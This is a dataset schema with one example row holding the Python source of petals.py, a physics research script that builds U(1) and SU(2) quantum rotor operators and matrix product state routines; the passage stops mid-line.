Schema:

| column | dtype | length / range |
| --- | --- | --- |
| repo_name | string | length 5–114 |
| repo_url | string | length 24–133 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| directory_id | string | length 40 |
| branch_name | string | 209 distinct values |
| visit_date | timestamp[ns] | |
| revision_date | timestamp[ns] | |
| committer_date | timestamp[ns] | |
| github_id | int64 | 9.83k to 683M (nullable, ⌀) |
| star_events_count | int64 | 0–22.6k |
| fork_events_count | int64 | 0–4.15k |
| gha_license_id | string | 17 distinct values |
| gha_created_at | timestamp[ns] | |
| gha_updated_at | timestamp[ns] | |
| gha_pushed_at | timestamp[ns] | |
| gha_language | string | 115 distinct values |
| files | list | length 1–13.2k |
| num_files | int64 | 1–13.2k |
Example row:

| field | value |
| --- | --- |
| repo_name | amilsted/mps-rotors |
| repo_url | https://github.com/amilsted/mps-rotors |
| snapshot_id | 74dc07b38b71abd06d014abde187b5336a29e10d |
| revision_id | f040c879cc9db7c41fc2749efba76af345b844ff |
| directory_id | da2c3981868a0de6a3a1ea239d45f5ea3dfd685a |
| branch_name | refs/heads/master |
| visit_date | 2021-01-23T08:56:11.410270 |
| revision_date | 2018-09-10T19:40:38 |
| committer_date | 2018-09-10T19:40:38 |
| github_id | 39,568,375 |
| star_events_count | 0 |
| fork_events_count | 0 |
| gha_license_id | null |
| gha_created_at | null |
| gha_updated_at | null |
| gha_pushed_at | null |
| gha_language | null |
| files | one entry, shown below: per-file metadata plus the full source text of /petals.py |
[
{
"alpha_fraction": 0.4431118965148926,
"alphanum_fraction": 0.4833640456199646,
"avg_line_length": 33.52920913696289,
"blob_id": "6066837fb1d5ae00148ef7c035e036ae96a57eec",
"content_id": "3bc12ccef3d59abfadf42075bc57ae38e379bf10",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 79797,
"license_type": "permissive",
"max_line_length": 139,
"num_lines": 2311,
"path": "/petals.py",
"repo_name": "amilsted/mps-rotors",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport datetime\nimport copy\nimport shutil\ntry:\n import fcntl\nexcept ImportError:\n print \"NO FILE LOCKING AVAILABLE (no fcntl on windows...)\"\nimport scipy as sp\nimport scipy.linalg as la\nimport sympy as sy\nimport evoMPS.tdvp_uniform as tdvp\nimport evoMPS.dynamics as dy\n\ntry:\n import matplotlib.cm as cm\nexcept ImportError:\n print \"Matplotlib error...\"\n\nRES_LOAD_FROM = 'petal_res.txt'\nuse_CUDA = False\n\ncols = {'G': 0,\n 'g2inv': 1, \n 'D': 2, \n 'L': 3,\n 'max_ir': 4,\n 'eta': 5,\n 'max_ir_oc':6,\n 'energy': 7, \n 'cl': 8, \n 'entr_max': 9, \n 'U_av': 10, \n 'U_0': 11,\n 'U2_0': 12,\n 'P_av': 13,\n 'P_0': 14,\n 'P2_0': 15,\n 'ReUUH_av': 16,\n 'ReUUH_0': 17,\n 'ReUUH2_0': 18,\n 'wv_dom': 19, \n 'wv_fit': 20, \n 'gap': 21, \n 'exc_fn': 22,\n 'fn': 23}\n \nPARAM = 'g2inv'\nPARAM_TEX = 'g^{-2}'\n \nnum_floatcols = len(cols) - 2\n\ndef get_ops(G, max_irrep):\n if G == 1:\n return U1_get_ops(max_irrep)\n if G == 2:\n return SU2_get_ops(max_irrep)\n\ndef U1_get_ops(max_n):\n d = 2 * max_n + 1\n U = sp.diag(sp.repeat(1. + 0.j, d - 1), k=-1)\n P = sp.diag(sp.arange(-max_n, +max_n + 1) * (1. + 0.j), k=0)\n P2 = sp.diag(sp.diag(P)**2)\n \n ReUUH = 0.5 * (sp.kron(U, U.conj().T) \n + sp.kron(U.conj().T, U)).reshape(d, d, d, d)\n \n ReUUH_tp = [[0.5 * U, U.conj().T],\n [0.5 * U.conj().T, U]]\n \n U = [[U]]\n P = [P]\n \n return U, P, P2, ReUUH, ReUUH_tp\n \ndef U1_get_L(theta, max_n=5):\n L = sp.diag(sp.exp(-1.j * theta * sp.arange(-max_n, +max_n + 1)), k=0)\n return L\n \ndef U1_get_theta(max_n=5, pos_theta=False):\n d = 2 * max_n + 1\n \n if pos_theta:\n def tf(n, m):\n if n != m:\n return 1.j * (n - m) / (n - m)**2\n else:\n return sp.pi\n else:\n def tf(n, m):\n if n != m:\n return 2.j * ((n - m) * sp.pi * sp.cos((m - n) * sp.pi)\n + sp.sin((m - n) * sp.pi)) / (2*sp.pi * (m - n)**2)\n else:\n return 0\n \n theta = sp.zeros((d, d), sp.complex128)\n for m in xrange(0, d):\n for n in xrange(0, d):\n theta[n, m] = tf(n, m)\n \n return theta\n \ndef U1_get_sqrtU(max_n=5):\n d = 2 * max_n + 1\n def f(n, m):\n return 1.j / (sp.pi * (0.5 + m - n))\n \n return sp.fromfunction(f, (d, d), dtype=sp.complex128)\n \ndef U1_get_interp_single(max_n=5):\n d = 2 * max_n + 1\n def f(n, j, m, k):\n if (m - n) + (k - j) + 1 == 0: \n return 2. * (-1)**(m - n) / (1. + 2. 
* (m - n)) / sp.pi\n else:\n return 0\n \n res = sp.zeros((d, d, d, d), sp.complex128)\n for n in xrange(0, d):\n for m in xrange(0, d):\n for j in xrange(0, d):\n for k in xrange(0, d):\n res[n, j, m, k] = f(n, j, m, k)\n \n return res.reshape(d**2, d**2) \n \ndef U1_get_interp(ops, max_n=5):\n d = 2 * max_n + 1\n \n U_, P, P2, ReUUH, ReUUH_tp = ops\n U = U_[0][0]\n #sU = U1_get_sqrtU(max_n=max_n)\n \n UU = sp.kron(U, U)\n #sUsU = sp.kron(sU, sU)\n sUsU = U1_get_interp_single(max_n)\n \n UU_pow = [sp.eye(d**2)]\n for n in xrange(1, max_n + 1):\n UU_pow.append(UU.dot(UU_pow[-1]))\n \n def get_sU_pow(m):\n if m % 2 == 0:\n return UU_pow[m/2]\n else:\n return sUsU.dot(UU_pow[m/2])\n \n V = sp.zeros((d**3, d**3), dtype=sp.complex128)\n for n in xrange(-max_n, max_n + 1):\n m1 = d**2 * (n + max_n)\n m2 = m1 + d**2\n V[m1:m2, m1:m2] = (get_sU_pow(n) if n >= 0 else get_sU_pow(-n).conj().T)\n \n return V\n \ndef U1_get_mom_sup(ops, max_n=5):\n d = 2 * max_n + 1\n \n psi = 1./sp.sqrt(d) * sp.ones((d,), dtype=sp.complex128)\n \n return psi\n \ndef U1_get_mom_exp(ops, lam=1, max_n=5):\n psi = sp.exp(-lam * abs(sp.arange(-max_n, max_n + 1)))\n \n psi /= la.norm(psi)\n \n return psi\n \ndef U1_get_mom_test(ops, max_n=5):\n d = 2 * max_n + 1\n psi = sp.zeros((d,), dtype=sp.complex128)\n \n psi[max_n] = 1\n psi[max_n + 2] = psi[max_n - 2] = 0.1\n \n psi /= la.norm(psi)\n \n return psi\n \ndef apply_interp(V, psi, AA, trunc=None):\n d = AA.shape[0]\n D = AA.shape[2]\n \n V = V.reshape((d,d,d,d,d,d))\n \n #In V, the slowest varying index is the new site\n Vpsi = sp.tensordot(V, psi, axes=((3,), (0,))).copy()\n \n Vpsi = Vpsi.reshape((d**3, d**2))\n AA = AA.reshape((d**2, D**2))\n \n B123 = Vpsi.dot(AA)\n \n B123 = B123.reshape((d,d,d,D,D))\n \n #Place the virtual indices at the ends, move the new site to the middle\n #i.e. D, d, d*, d, D (d* is the new site)\n B123 = sp.transpose(B123, axes=(3, 1, 0, 2, 4))\n \n #Prepare for SVD splitting 12 and 3\n B12_3 = B123.reshape((D * d * d, d * D))\n \n B12_3_U, B12_3_s, B12_3_Vh = la.svd(B12_3, full_matrices=False)\n if not trunc is None:\n B12_3_s = B12_3_s[:trunc]\n B12_3_U = B12_3_U[:, :trunc]\n B12_3_Vh = B12_3_Vh[:trunc, :]\n \n B12_3_sr = la.diagsvd(sp.sqrt(B12_3_s), len(B12_3_s), len(B12_3_s))\n \n B3 = B12_3_sr.dot(B12_3_Vh).reshape((len(B12_3_sr), d, D)) \n B3 = sp.transpose(B3, axes=(1, 0, 2)).copy()\n \n B1_2 = B12_3_U.dot(B12_3_sr).reshape(D * d, d * B3.shape[1])\n \n B1_2_U, B1_2_s, B1_2_Vh = la.svd(B1_2, full_matrices=False)\n if not trunc is None:\n B1_2_s = B1_2_s[:trunc]\n B1_2_U = B1_2_U[:, :trunc]\n B1_2_Vh = B1_2_Vh[:trunc, :]\n \n B1_2_sr = la.diagsvd(sp.sqrt(B1_2_s), len(B1_2_s), len(B1_2_s))\n \n B1 = B1_2_U.dot(B1_2_sr).reshape(D, d, len(B1_2_sr))\n B1 = sp.transpose(B1, axes=(1, 0, 2))\n \n B2 = B1_2_sr.dot(B1_2_Vh).reshape(len(B1_2_sr), d, B3.shape[1])\n B2 = sp.transpose(B2, axes=(1, 0, 2))\n \n return B1, B2, B3\n \ndef get_interp_state(V, psi, s, trunc):\n assert s.L == 1\n s.update()\n AA = tdvp.tm.calc_AA(s.A[0], s.A[0])\n \n B1, B2, B3 = apply_interp(V, psi, AA, trunc=trunc)\n \n B31 = tdvp.tm.calc_AA(B3, B1)\n \n C3, C4, C1 = apply_interp(V, psi, B31, trunc=trunc)\n \n s2 = create_tdvp(trunc, s.ham, ham_tp=s.ham_tp, L=4)\n \n s2.A = [C1, B2, C3, C4]\n s2.update()\n \n #This gives the same result as get_interp_state_2 for |psi> = |0>. 
Good.\n #Also for |psi> = 1/sqrt(2) (|2> + |-2>).\n #Results should differ for |psi> = 1/sqrt(2) (|1> + |-1>).\n #..they do, but now get_interp_state changes the curvature\n #between the original sites... :( get_interp_state_2 does not.\n \n return s2\n \ndef get_interp_state_once(V, psi, s, trunc):\n assert s.L == 1\n s.update()\n AA = tdvp.tm.calc_AA(s.A[0], s.A[0])\n \n B1, B2, B3 = apply_interp(V, psi, AA, trunc=trunc)\n \n s2 = create_tdvp(trunc, s.ham, ham_tp=s.ham_tp, L=3)\n \n s2.A = [B1, B2, B3]\n s2.update()\n \n return s2\n \ndef get_interp_state_2(psi, s1, trunc=None, max_n=5, ops=None):\n if ops is None:\n ops = get_ops(1, max_n)\n \n d = 2 * max_n + 1\n D = s1.D\n \n psif = psi != 0\n d_eff = sp.count_nonzero(psif)\n ds = sp.arange(d)[psif]\n \n eyeD = sp.eye(D)\n \n B1 = sp.zeros((d, D, d_eff, D, d_eff), dtype=sp.complex128)\n for j in xrange(d_eff):\n B1[ds[j], :, j, :, j] = eyeD * psi[psif][j]\n \n B1 = B1.reshape((d, D * d_eff, D * d_eff))\n \n A = s1.A[0].copy()\n \n U = ops[0][0][0]\n U_pow = [sp.eye(d)]\n for n in xrange(1, max_n + 1):\n U_pow.append(U.dot(U_pow[-1]))\n \n sU = U1_get_sqrtU(max_n=max_n)\n \n sU_pow = [sp.eye(d)]\n for m in xrange(1, 2 * max_n + 1):\n if m % 2 == 0:\n sU_pow.append(U_pow[m/2])\n else:\n sU_pow.append(sU.dot(U_pow[m/2]))\n \n def get_sU_pow(m):\n if m < 0:\n return sU_pow[-m].conj().T\n else:\n return sU_pow[m]\n \n MPO = []\n for n in xrange(-max_n, max_n + 1):\n row = []\n if psif[n + max_n]:\n MPO.append(row)\n for m in xrange(-max_n, max_n + 1):\n if psif[m + max_n]:\n row.append(get_sU_pow((m + n)))\n \n MPO = sp.array(MPO, dtype=sp.complex128)\n \n B2 = tdvp.tm.apply_MPO_local(MPO, A)\n \n s2 = create_tdvp(D * d_eff, s1.ham, ham_tp=s1.ham_tp, L=2)\n \n s2.A = [B1, B2]\n s2.update()\n \n return s2 \n \n#def SU2_get_l(m): \n# import sympy as sy\n# return sy.floor((-1 + sy.sqrt(1 + 8 * m)) / 2) / 2\n# \n#def SU2_get_j(m):\n# return m - 2 * SU2_get_l(m)**2 - 2 * SU2_get_l(m)\n# \n#def SU2_get_CG(m1, m2, m, itb):\n# import sympy.physics.quantum.cg as cg\n# return cg.CG(SU2_get_l(m1), SU2_get_j(m1), SU2_get_l(m2), SU2_get_j(m2), \n# SU2_get_l(m), SU2_get_j(m)).doit()\n\ndef SU2_get_Ws(tl):\n \"\"\"This gets the generalized W states, from which irreps of group elements\n and the generators can be obtained.\n \"\"\"\n from itertools import permutations\n def bool2int(x):\n y = 0\n for i,j in enumerate(x):\n y += j<<i\n return y\n \n W = [None] * (tl + 1)\n for m in xrange(tl + 1):\n perms = sp.array(list(set(permutations([0] * (tl - m) + [1] * m))))\n W[m] = sp.zeros((2**tl, ), dtype=sp.float64)\n for p in perms:\n W[m][bool2int(p)] += 1. 
/ sp.sqrt(len(perms))\n #print W[m], sp.inner(W[m], W[m])\n \n return W\n \n\ndef SU2_get_irrep(U, tl, W=None):\n if W is None:\n W = SU2_get_Ws(tl)\n \n prod = sp.array([[1]])\n for i in xrange(tl):\n prod = sp.kron(U, prod)\n \n Ul = sp.zeros((tl + 1, tl + 1), dtype=sp.complex128)\n for m in xrange(tl + 1):\n for n in xrange(tl + 1):\n Ul[m, n] = W[m].T.dot(prod.dot(W[n]))\n \n return Ul\n \npaus = [0.5 * sp.array([[0, 1], [1, 0]]), \n 0.5j * sp.array([[0, -1], [1, 0]]),\n 0.5 * sp.array([[1, 0], [0, -1]])]\n \ndef SU2_get_gen(al, tl, W=None):\n if W is None:\n W = SU2_get_Ws(tl)\n \n pau = paus[al]\n \n M = sp.zeros((2**tl, 2**tl), dtype=sp.complex128)\n for n in xrange(tl):\n M += sp.kron(sp.eye(2**(n)), sp.kron(pau, sp.eye(2**(tl - n - 1))))\n \n tau = sp.zeros((tl + 1, tl + 1), dtype=sp.complex128)\n for m in xrange(tl + 1):\n for n in xrange(tl + 1):\n tau[m, n] = W[m].T.dot(M.dot(W[n]))\n \n return tau\n \ndef SU2_test_irreps(tl):\n l = tl / 2.\n W = SU2_get_Ws(tl)\n taus = [SU2_get_gen(al, tl, W=W) for al in [0, 1, 2]]\n eye_test = taus[0].dot(taus[0].conj().T) + taus[1].dot(taus[1].conj().T) + taus[2].dot(taus[2].conj().T)\n print \"test generators:\", sp.allclose(eye_test, sp.eye(tl + 1) * l * (l + 1))\n print \"[t0,t1] - it2 = 0:\", sp.allclose(taus[0].dot(taus[1]) - taus[1].dot(taus[0]), 1.j * taus[2])\n print \"[t2,t0] - it1 = 0:\", sp.allclose(taus[2].dot(taus[0]) - taus[0].dot(taus[2]), 1.j * taus[1])\n print \"[t1,t2] - it0 = 0:\", sp.allclose(taus[1].dot(taus[2]) - taus[2].dot(taus[1]), 1.j * taus[0])\n \n om = sp.rand(3)\n G_half = la.expm(1.j * (om[0] * paus[0] + om[1] * paus[1] + om[2] * paus[2]))\n print \"G_half unitary\", sp.allclose(G_half.dot(G_half.conj().T), sp.eye(2))\n Gl = la.expm(1.j * (om[0] * taus[0] + om[1] * taus[1] + om[2] * taus[2]))\n print \"G_l unitary\", sp.allclose(Gl.dot(Gl.conj().T), sp.eye(tl + 1))\n Gl_ = SU2_get_irrep(G_half, tl, W=W)\n print \"G_l test\", sp.allclose(Gl, Gl_)\n\ndef SU2_get_PL(max_2l=3):\n itb = SU2_build_index_ints(max_2l=max_2l)\n dim = len(itb)\n \n tl = 0\n tau_l = SU2_get_gen(0, tl)\n PL = [None] * 3\n for al in [0, 1, 2]:\n PL[al] = sp.zeros((dim, dim), dtype=sp.complex128)\n for mL in xrange(dim):\n for mR in xrange(dim):\n tlL, jpL, kpL = itb[mL]\n tlR, jpR, kpR = itb[mR]\n if not (tlL == tlR and kpL == kpR):\n continue\n \n if tlL != tl:\n tl = tlL\n tau_l = SU2_get_gen(al, tl)\n\n PL[al][mL, mR] = tau_l[jpR, jpL]\n \n return PL\n \ndef SU2_get_PR(max_2l=3):\n itb = SU2_build_index_ints(max_2l=max_2l)\n dim = len(itb)\n \n tl = 0\n tau_l = SU2_get_gen(0, tl)\n PR = [None] * 3\n for al in [0, 1, 2]:\n PR[al] = sp.zeros((dim, dim), dtype=sp.complex128)\n for mL in xrange(dim):\n for mR in xrange(dim):\n tlL, jpL, kpL = itb[mL]\n tlR, jpR, kpR = itb[mR]\n if not (tlL == tlR and jpL == jpR):\n continue\n \n if tlL != tl:\n tl = tlL\n tau_l = SU2_get_gen(al, tl)\n\n PR[al][mL, mR] = -tau_l[kpL, kpR]\n \n return PR\n \ndef SU2_test_U_PL(max_2l=3):\n PL = SU2_get_PL(max_2l=max_2l)\n U = SU2_get_U(max_2l=max_2l)\n \n print \"U_0,0 = U*_1,1\", sp.allclose(U[0][0], U[1][1].conj().T)\n print \"U_0,1 = -U*_1,0\", sp.allclose(U[0][1], -U[1][0].conj().T)\n #print \"U_0,0 U*_0,0 = 1 - U_0,1 U*_0,1\", sp.allclose(U[0][0].dot(U[1][1]), sp.eye(U[0][0].shape[0]) + U[0][1].dot(U[1][0]))\n \n for al in [0, 1, 2]:\n for m in [0, 1]:\n for n in [0, 1]:\n com = PL[al].dot(U[m][n]) - U[m][n].dot(PL[al])\n com_ = 0\n for k in [0, 1]:\n com_ += paus[al][m, k] * U[k][n]\n print \"[PL_%d, U_%d,%d] = (F_%d U)_%d,%d:\" % (al, m, n, al, m, n), 
\\\n sp.allclose(com, com_), la.norm(com - com_)\n for al in [0, 1, 2]:\n for m in [0, 1]:\n for n in [0, 1]:\n com = PL[al].dot(U[m][n].conj().T) - U[m][n].conj().T.dot(PL[al])\n com_ = 0\n for k in [0, 1]:\n com_ += -paus[al][k, m] * U[k][n].conj().T\n print \"[PL_%d, U*_%d,%d] = (U*' F_%d)_%d,%d:\" % (al, m, n, al, m, n), \\\n sp.allclose(com, com_), la.norm(com - com_)\n \n P2 = SU2_get_P2(max_2l=max_2l)\n P2_ = PL[0].dot(PL[0]) + PL[1].dot(PL[1]) + PL[2].dot(PL[2])\n print \"P2 = PL_0^2 + PL_1^2 + PL_2^2:\", sp.allclose(P2, P2_)\n \n d_maxtl = sp.sum((max_2l + 1)**2)\n start_maxtl = len(P2) - d_maxtl\n \n UUd = sp.zeros_like(U[0][0])\n for m in [0, 1]:\n for n in [0, 1]:\n UUd.fill(0)\n for k in [0, 1]:\n UUd += U[m][k].dot(U[n][k].conj().T)\n print \"(U U^dag)_%d,%d = delta_%d,%d (restricted to all but highest irrep):\" % (m, n, m, n), \\\n sp.allclose(UUd[:start_maxtl, :start_maxtl], 0 if m != n else sp.eye(start_maxtl))\n print \"Error (norm distance) in highest irrep:\", la.norm(UUd[start_maxtl:, start_maxtl:] - 0 if m != n else sp.eye(d_maxtl))\n \n eijk = sp.zeros((3, 3, 3))\n eijk[0, 1, 2] = eijk[1, 2, 0] = eijk[2, 0, 1] = 1\n eijk[0, 2, 1] = eijk[2, 1, 0] = eijk[1, 0, 2] = -1\n for al in [0, 1, 2]:\n for be in [0, 1, 2]:\n com = PL[al].dot(PL[be]) - PL[be].dot(PL[al])\n gas = sp.argwhere(eijk[al, be, :] != 0)\n if len(gas) > 0:\n ga = gas[0]\n com_ = -1.j * eijk[al, be, ga] * PL[ga]\n else:\n com_ = 0\n print \"[PL_%d, PL_%d] = -1j * (eps^%d,%d_ga PL_ga)\" % (al, be, al, be), sp.allclose(com, com_)\n\ndef SU2_get_L(U, max_2l=3):\n itb = SU2_build_index_ints(max_2l=max_2l)\n dim = len(itb)\n \n tl = 0\n G_l = sp.array([[1]])\n L = sp.zeros((dim, dim), dtype=sp.complex128)\n for mL in xrange(dim):\n for mR in xrange(dim):\n tlL, jpL, kpL = itb[mL]\n tlR, jpR, kpR = itb[mR]\n if not (tlL == tlR and kpL == kpR):\n continue\n \n if tlL != tl:\n tl = tlL\n G_l = SU2_get_irrep(U.conj().T, tl)\n\n L[mL, mR] = G_l[jpR, jpL]\n \n return L\n \ndef SU2_get_R(U, max_2l=3):\n itb = SU2_build_index_ints(max_2l=max_2l)\n dim = len(itb)\n \n tl = 0\n G_l = sp.array([[1]])\n R = sp.zeros((dim, dim), dtype=sp.complex128)\n for mL in xrange(dim):\n for mR in xrange(dim):\n tlL, jpL, kpL = itb[mL]\n tlR, jpR, kpR = itb[mR]\n if not (tlL == tlR and jpL == jpR):\n continue\n \n if tlL != tl:\n tl = tlL\n G_l = SU2_get_irrep(U, tl)\n\n R[mL, mR] = G_l[kpL, kpR]\n \n return R\n\ndef SU2_get_random_U():\n om = sp.rand(3)\n U = la.expm(1.j * (om[0] * paus[0] + om[1] * paus[1] + om[2] * paus[2]))\n return U\n\ndef SU2_test_LR(max_2l=3):\n U = SU2_get_random_U()\n V = SU2_get_random_U()\n\n L_U = SU2_get_L(U, max_2l=max_2l)\n R_V = SU2_get_R(V, max_2l=max_2l)\n print \"[L_U, R_V] = 0:\", sp.allclose(L_U.dot(R_V) - R_V.dot(L_U), 0), la.norm(L_U.dot(R_V) - R_V.dot(L_U))\n \n L_Ui = SU2_get_L(U.conj().T, max_2l=max_2l)\n R_Vi = SU2_get_R(V.conj().T, max_2l=max_2l)\n print \"L_Ui = L_U^dag:\", sp.allclose(L_U.conj().T, L_Ui)\n print \"R_Vi = R_V^dag:\", sp.allclose(R_V.conj().T, R_Vi)\n \n L_I = SU2_get_L(sp.eye(2), max_2l=max_2l)\n R_I = SU2_get_L(sp.eye(2), max_2l=max_2l)\n print \"L_I = I:\", sp.allclose(L_I, sp.eye(len(R_I)))\n print \"R_I = I:\", sp.allclose(R_I, sp.eye(len(R_I)))\n\ndef SU2_get_P2(max_2l=3):\n twols = sp.arange(max_2l + 1)\n dim = sp.sum((twols + 1)**2)\n \n P2diag = []\n for twol in twols:\n P2diag += [twol/2. * (twol/2. 
+ 1)] * (twol + 1)**2\n \n assert len(P2diag) == dim\n \n return sp.diag(sp.array(P2diag, dtype=sp.float64))\n \ndef SU2_build_index(max_2l=3):\n tbl = []\n for twol in xrange(max_2l + 1):\n l = twol/2.\n tbl += [[l, jp - l, kp - l] for jp in xrange(twol + 1) for kp in xrange(twol + 1)]\n return sp.array(tbl, dtype=sp.float64)\n \ndef SU2_build_index_ints(max_2l=3):\n tbl = []\n for twol in xrange(max_2l + 1):\n tbl += [[twol, jp, kp] for jp in xrange(twol + 1) for kp in xrange(twol + 1)]\n return sp.array(tbl)\n \ndef SU2_build_CGs(max_2l=3):\n \"\"\"This grabs a tensor of Clebsch-Gordan coefficients <lL,mL|lR,mR;1/2,mM>\n skipping the zeros where the l1 != l3 +/- 1/2.\n There is a cutoff in l given by max_2l.\n \n Uses sympy to get the CG coeffients exactly before converting to floats.\n \"\"\"\n from sympy.physics.quantum.cg import CG\n \n vtb = []\n half = sy.S(1) / 2\n for twolL in xrange(max_2l + 1):\n vtb_ = [None] * (max_2l + 1)\n lL = sy.S(twolL) / 2\n for twolR in [twolL - 1, twolL + 1]:\n if twolR > max_2l or twolR < 0:\n continue\n lR = sy.S(twolR) / 2\n vtb_[twolR] = [[[sy.N(CG(lR, mRp - lR, half, mMp - half, lL, mLp - lL).doit())\n for mRp in xrange(twolR + 1)]\n for mMp in [0, 1]]\n for mLp in xrange(twolL + 1)]\n vtb.append(vtb_)\n return vtb\n \ndef SU2_test_CGs(max_2l=3):\n CGs = SU2_build_CGs(max_2l=max_2l)\n \n UCG = sp.zeros((6, 6), dtype=sp.float64)\n UCG.fill(sp.NaN)\n tlR = 2\n for tlL in [tlR - 1, tlR + 1]:\n if tlL < 0 or tlL > max_2l:\n continue\n shft = (4 if tlL == 1 else 0)\n for mLp in xrange(tlL + 1):\n for mMp in [0, 1]:\n for mRp in xrange(tlR + 1):\n UCG[shft + mLp, mMp * (tlR + 1) + mRp] = CGs[tlL][tlR][mLp][mMp][mRp]\n print UCG\n print \"CGd CG = 1:\", sp.allclose(UCG.dot(UCG.conj().T), sp.eye(len(UCG)))\n \ndef SU2_test_trunc_CG(max_2l=3):\n CGs = SU2_build_CGs(max_2l=max_2l)\n dim = sp.sum(sp.arange(max_2l + 1) + 1)\n \n def get_M(tl, m):\n return (tl**2 + tl + 2 * m) / 2\n \n #print get_M(0, 0), get_M(1, 0), get_M(1, 1), get_M(2, 0), get_M(2, 1), get_M(2, 2), get_M(3, 0), get_M(3, 1)\n \n eye_ = sp.zeros((dim, dim), dtype=sp.float64)\n eye_.fill(sp.NaN)\n for tl1 in xrange(max_2l + 1):\n for tl2 in xrange(max_2l + 1):\n for m1 in xrange(tl1 + 1):\n for m2 in xrange(tl2 + 1):\n entry = 0\n for tl in xrange(max_2l + 1):\n for m in xrange(tl + 1):\n for mh in [0, 1]:\n if CGs[tl1][tl] is None or CGs[tl2][tl] is None:\n continue\n entry += (tl + 1) / sp.sqrt(tl1 + 1) / sp.sqrt(tl2 + 1) * CGs[tl1][tl][m1][mh][m] * CGs[tl2][tl][m2][mh][m]\n eye_[get_M(tl1, m1), get_M(tl2, m2)] = entry\n return eye_.diagonal()\n \ndef SU2_get_U(max_2l=3):\n itb = SU2_build_index_ints(max_2l=max_2l)\n dim = len(itb)\n \n CGs = SU2_build_CGs(max_2l=max_2l)\n\n U = [[None, None], [None, None]]\n for m in range(2):\n for n in range(2):\n U[m][n] = sp.zeros((dim, dim), dtype=sp.float64)\n for mL in xrange(dim):\n for mR in xrange(dim):\n tlL, jpL, kpL = itb[mL]\n tlR, jpR, kpR = itb[mR]\n \n if CGs[tlL][tlR] is None: #Combination is always zero.\n continue\n \n CGj = CGs[tlL][tlR][jpL][m][jpR]\n CGk = CGs[tlL][tlR][kpL][n][kpR]\n U[m][n][mL, mR] = (sp.sqrt((tlR + 1.) 
/ (tlL + 1.)) * CGj * CGk)\n return U\n \ndef SU2_get_RetrUUH(U):\n d = U[0][0].shape[0]\n trUUH = sp.zeros((d**2, d**2), dtype=U[0][0].dtype)\n for j in [0, 1]:\n for k in [0, 1]:\n trUUH += 0.5 * (sp.kron(U[j][k], U[j][k].T) + sp.kron(U[j][k].T, U[j][k]))\n \n return trUUH.reshape(d, d, d, d)\n \ndef SU2_get_RetrUUH_tp(U):\n trUUH = []\n for k in [0, 1]: #abbreviated version, exploiting unitary structure\n trUUH.append([U[0][k], U[0][k].T])\n trUUH.append([U[0][k].T, U[0][k]])\n \n return trUUH\n \ndef SU2_get_ops(max_2l=3):\n PL = SU2_get_PL(max_2l=max_2l)\n P2 = SU2_get_P2(max_2l=max_2l)\n U = SU2_get_U(max_2l=max_2l)\n RetrUUH = SU2_get_RetrUUH(U)\n RetrUUH_tp = SU2_get_RetrUUH_tp(U)\n \n return U, PL, P2, RetrUUH, RetrUUH_tp\n \ndef SU2_test_GI(max_2l=3):\n U, PL, P2, RetrUUH, RetrUUH_tp = SU2_get_ops(max_2l=max_2l)\n \n RetrUUH = RetrUUH.reshape((len(P2)**2, len(P2)**2))\n \n om = sp.rand(3)\n U = la.expm(1.j * (om[0] * paus[0] + om[1] * paus[1] + om[2] * paus[2]))\n\n L_U = SU2_get_L(U, max_2l=max_2l)\n R_U = SU2_get_R(U, max_2l=max_2l)\n \n LR_U = L_U.dot(R_U)\n LR_U_12 = sp.kron(LR_U, LR_U)\n\n print \"Gauge noninvariance:\"\n print \"LR_U U_00 LR_U* != U_00:\", not sp.allclose(LR_U.dot(U[0][0]).dot(LR_U.conj().T), U[0][0])\n print \"LR_U U_01 LR_U* != U_01:\", not sp.allclose(LR_U.dot(U[0][1]).dot(LR_U.conj().T), U[0][1])\n print \"LR_U U_10 LR_U* != U_10:\", not sp.allclose(LR_U.dot(U[1][0]).dot(LR_U.conj().T), U[1][0])\n print \"LR_U U_11 LR_U* != U_11:\", not sp.allclose(LR_U.dot(U[1][1]).dot(LR_U.conj().T), U[1][1])\n print \"LR_U PL_0 LR_U* != PL_0:\", not sp.allclose(LR_U.dot(PL[0]).dot(LR_U.conj().T), PL[0])\n print \"LR_U PL_1 LR_U* != PL_1:\", not sp.allclose(LR_U.dot(PL[1]).dot(LR_U.conj().T), PL[1])\n print \"LR_U PL_2 LR_U* != PL_2:\", not sp.allclose(LR_U.dot(PL[2]).dot(LR_U.conj().T), PL[2])\n \n print \"\\nGauge invariance (global rotation from left and right):\"\n print \"LR_U P2 LR_U* = P2:\", sp.allclose(LR_U.dot(P2).dot(LR_U.conj().T), P2)\n print \"(LR_U x LR_U) RetrUUH (LR_U* x LR_U*) = RetrUUH:\", sp.allclose(LR_U_12.dot(RetrUUH).dot(LR_U_12.conj().T), RetrUUH)\n \n L_U_12 = sp.kron(L_U, L_U)\n R_U_12 = sp.kron(R_U, R_U)\n \n print \"\\nRotation invariance:\"\n print \"L_U P2 L_U* = P2:\", sp.allclose(L_U.dot(P2).dot(L_U.conj().T), P2)\n print \"R_U P2 R_U* = P2:\", sp.allclose(R_U.dot(P2).dot(R_U.conj().T), P2)\n print \"(L_U x L_U) RetrUUH (L_U* x L_U*) = RetrUUH:\", sp.allclose(L_U_12.dot(RetrUUH).dot(L_U_12.conj().T), RetrUUH)\n print \"(R_U x R_U) RetrUUH (R_U* x R_U*) = RetrUUH:\", sp.allclose(R_U_12.dot(RetrUUH).dot(R_U_12.conj().T), RetrUUH)\n \ndef SU2_test_rotor(max_2l=3):\n U, PL, P2, RetrUUH, RetrUUH_tp = SU2_get_ops(max_2l=max_2l)\n \n Fs = paus + [0.5j * sp.eye(2)]\n N = [sum([-1.j * Fs[al][m, n] * U[n][m] for m in [0, 1] for n in [0, 1]])\n for al in [0, 1, 2, -1]]\n \n NN = sum([sp.kron(Nal, Nal) for Nal in N])\n \n print \"NN = NN*\", sp.allclose(NN, NN.conj().T)\n \n d_maxtl = sp.sum((max_2l + 1)**2)\n start_maxtl = len(P2) - d_maxtl\n for al in [0, 1, 2, -1]:\n for be in [0, 1, 2, -1]:\n com = (N[al].dot(N[be]) - N[be].dot(N[al]))[:start_maxtl, :start_maxtl]\n print \"[N_%d, N_%d] = 0 (up to last irrep)\" % (al, be), sp.allclose(com, 0)\n \n print \"RetrUUH = 2 * NN\", sp.allclose(RetrUUH.reshape(NN.shape), 2 * NN)\n \n eijk = 